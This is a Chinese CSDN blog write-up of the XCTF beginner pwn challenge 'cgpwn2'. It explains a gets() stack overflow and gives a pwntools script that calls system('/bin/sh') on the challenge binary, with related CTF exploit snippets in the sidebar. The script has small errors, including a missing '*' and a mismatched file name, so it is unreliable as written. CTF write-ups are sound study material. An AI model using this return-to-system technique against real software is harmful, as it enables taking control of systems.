攻防世界-pwn新手区-cgpwn2

最新推荐文章于 2024-07-12 10:31:01 发布
最新推荐文章于 2024-07-12 10:31:01 发布
阅读量234 收藏
点赞数 1
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHAWUCIREN1/article/details/119567791
版权
该博客探讨了一个没有PIE和Canary保护的程序,通过ida分析找到`hello`函数和`bin/sh`字符串地址,利用栈空间布局构造payload,覆盖got表中的`system`函数地址,最终实现调用`system`执行`/bin/sh`获取shell。
摘要由CSDN通过智能技术生成

先运行一下在这里插入图片描述
老规矩,checksec 和file
在这里插入图片描述
pie和canary关了
ida 查看一下
hello函数
在这里插入图片描述
name在bss段
有没有发现bin/sh
所以我们可以自己写一个shellcode
name_bin_sh = 0804A080
看一下s的栈空间

00000027                 db ? ; undefined
-00000026 s               dw ?
-00000024                 db ? ; undefined
-00000023                 db ? ; undefined
-00000022                 db ? ; undefined
-00000021                 db ? ; undefined
-00000020                 db ? ; undefined
-0000001F                 db ? ; undefined
-0000001E                 db ? ; undefined
-0000001D                 db ? ; undefined
-0000001C                 db ? ; undefined
-0000001B                 db ? ; undefined
-0000001A                 db ? ; undefined
-00000019                 db ? ; undefined
-00000018                 db ? ; undefined
-00000017                 db ? ; undefined
-00000016                 db ? ; undefined
-00000015                 db ? ; undefined
-00000014                 db ? ; undefined
-00000013                 db ? ; undefined
-00000012                 db ? ; undefined
-00000011                 db ? ; undefined
-00000010                 db ? ; undefined
-0000000F                 db ? ; undefined
-0000000E                 db ? ; undefined
-0000000D                 db ? ; undefined
-0000000C                 db ? ; undefined
-0000000B                 db ? ; undefined
-0000000A                 db ? ; undefined
-00000009                 db ? ; undefined
-00000008                 db ? ; undefined
-00000007                 db ? ; undefined
-00000006                 db ? ; undefined
-00000005                 db ? ; undefined
-00000004                 db ? ; undefined
-00000003                 db ? ; undefined
-00000002                 db ? ; undefined
-00000001                 db ? ; undefined
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)

覆盖掉就完了
payload = b’A’(0x26+4)

这里我们需要去它的got表里面找system函数
got表和plt表都是用来存储函数调用是的一些特殊地址,这个大家可以自行百度
可以用这两句代码去调用plt表

elf = ELF("cgpwn2")
system = elf.plt["system"]

from pwn import *
context(os="linux", arch="x86", log_level="debug")
elf = ELF("cgpwn2")
system_addr = elf.plt["system"]
p = process('./cpwn2')
name_bin_sh = 0x0804A080
payload = b'A'(0x26+4) + p32(system_addr) + b'a'*4 + p32(name_bin_sh)

p.recvuntil("please tell me your name")
p.sendline('/bin/sh')
p.recvuntil("hello,you can leave some message here:\n")
p.sendline(payload)
p.interactive()
续梦人
关注
专栏目录
攻防世界 when_did_you_born
09-28 252
1.题目 2.IDA反汇编C程序 3.程序流程分析 首先输入Birth,如果Birth==1926直接退出;否则,输入Name,这时,判断Birth是否==1926.等于则get flag。 很明显,输入名字就是专门为我们提供溢出点的。两个变量的位置如下图: 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo
adworld攻防世界-pwn-新手-wp
令则
03-05 1162
adworld-pwn-新手 tcl 到现在才算是正经昨晚攻防世界的pwn新手, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
pwn学习笔记2】cgpwn2攻防世界新手pwn题)
weixin_45927195的博客
03-14 487
改变system函数的参数 先运行,发现可以输入两次。再查看防御机制,开启了NX保护,即堆栈不可执行。 用ida查看主函数,发现只有一个hello()函数。查看其内容,直接找到运行时看到的"please tell me your name"。第一次输入规定了长度,第二次没有规定,存在漏洞: 找到一个后门函数pwn(),存在 call _system语句,但是这个函数的参数"echo heheh...
攻防世界 cgpwn2
最新发布
weixin_73399382的博客
07-12 1054
看到这fgets读取我们的输入到name中,因为程序没留shell,我们可以直接传入/bin/sh这个系统的默认shell,又因为下面使用gets从s中读取,我们可以使用让s溢出返回我们在name里面传入的默认/bin/sh。下面这个是利用plt查找system在got表中的地址,以后程序开启地址随机化的话函数的地址是变化的,就需要这么来找。s的内存空间+0处start到s需0x26字符,r是偏移指针到start处需0x4字符。system函数的地址我们刚才已经找到了,可以直接写脚本了。
攻防世界-cgpwn2
qq_45771413的博客
04-23 274
查看保护 无栈保护,无PIE保护 IDA 两次输入,一个输入名字(限制了输入长度),一个输入信息(gets可以作栈溢出) 解题思路 shift+f12查找字符串并没有发现/bin/sh,可能需要自己整,或者藏在某个变量里 在找_system函数的过程中,发现了pwn命名的函数,进入发现有system调用,第一次做的时候看到system就乐了,直接溢出s,然后跳转到pwn地址,结果真就只有 hehehe …… 估计这是出题人的恶趣味…… 后来我在函数列表里找到了真正的_system,括号内的comma
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
攻防世界-PWN进阶-EasyPwn(XCTF 4th-WHCTF-2017)
weixin_44145820的博客
03-04 1955
这题其实不算难,不过漏洞比较隐蔽,需要细心才能发现 题目分析 checksec: RELRO只是部分开启,考虑覆写GOT表 main: echo: 在该函数中存在一个溢出: v2的大小为1000(0x3E8),而我们的输入最大为0x438(输入缓冲大小为0x400),如果我们的输入大于0x3E8,就会覆盖了v3的内容(%s),而%s是snprintf在向v2写入数据时格式化写入的数据的,如...
攻防世界PWN新手练习——cgpwn2
smsyz2019的博客
09-23 312
攻防世界PWN新手练习——cgpwn2 首先检查文件的有哪些保护 checksec cgpwn2 32位程序 用IDA反编译文件 main函数中只有hello函数,点击查看
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
攻防世界cgpwn2
zyh18851473527的博客
08-05 887
首先checksec,之后放入IDA中 点进hello 发现gets()函数可能会存在栈溢出,然后我们点进name 发现 name 地址是固定的,那我们可以它写入 bin/sh ,接着看能不能找到system 找到啦!所以这个题目的思路是:通过栈溢出漏洞,调用system函数,同时在name中写入"/bin/sh",把参数地址设置为name的首地址,就可以getshell了! gets() ...
[攻防世界]cgpwn2
逆向萌新的博客
06-11 388
[攻防世界]cgpw2n
攻防世界pwn[cgpwn2]
SUOYE_GUANXING的博客
10-31 132
将 "/bin/sh" 写入name, 用gets函数进行栈溢出, system为返回值, name为system的参数。flag为:cyberpeace{b232df4322e677518de6a61097130634}下载文件,先check一下;这里需要0x26+0x4才能到我们的返回地址;发现system,但没有/bin/sh;跟进name发现它是一个静态地址;学的还是有点迷,但慢慢来嘛~32位的ida打开;进入hello函数;
攻防世界pwn-cgpwn2
a_silly_coder的博客
01-15 1450
下载文件后,首先检查保护: 随后将文件拖入ida,查看源码,在hello函数中,发现了如下代码 首先用安全的fgets输入了一个变量,接着用不安全的gets接收了一个变量,在此处可以确认是栈溢出,且溢出点就在此处。 开始寻找利用方式,发现了system函数 还缺一个"/bin/sh"字符串,找遍了代码,没有发现,但是由于此前可以有一个自己的输入,保存在name变量上,即可以自己手动输入"/bin/sh",自此,设计栈结构为: 开始编写脚本: from pwn imp...
攻防世界 Pwn cgpwn2
MrTreebook的博客
12-12 622
攻防世界 Pwn cgpwn21.题目下载地址2.checksec分析3.IDA分析3.1.看一下溢出大小4.exp4.1.运行结果 1.题目下载地址 点击下载 2.checksec分析 只开启了NX保护,应该不会有太多障碍 直接进IDA看一下 3.IDA分析 main函数中有一个hello函数,我们直接看hello函数 可以看到第二个gets函数没有限制输入大小,很明显是栈溢出 再看看有没有其他后门函数 看到有一个pwn函数中调用了system 而且第一个gets函数输入的name正好是处于bs
攻防世界pwn——cgpwn2
qq_62076255的博客
11-05 326
攻防世界pwn——cgpwn2
攻防世界PWN-cgpwn2
Deeeelete的博客
11-14 361
题目:cgpwn2 拖进PE查看一下 32位程序 checksec查看 简单执行一下 开32位IDA f5反编译main函数 main函数中直接就是输出了,输入的内容好像藏在了hello方法里 双击进去查看 单独拿出源码 char *hello() { char *v0; // eax@1 signed int v1; // ebx@1 unsigned int v2; // ecx@3 char *v3; // eax@5 char s; // [sp+12
攻防世界_pwn_cgpwn2(萌新版)
TedLau的博客
02-24 385
首发于鄙人博客:传送门 0x00 前言 省略file checksec,此两步大家都能够实现。 0x10 步骤 0x10 hello函数 为32位文件,用32位ida打开后,可以发现如下hello函数 在hello函数中我们可以发现,他让我们输入两块内容,一个是name,一个是some message。 0x11 _system函数 而在左侧的函数栏中,我们可...
攻防世界pwn-forgot
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值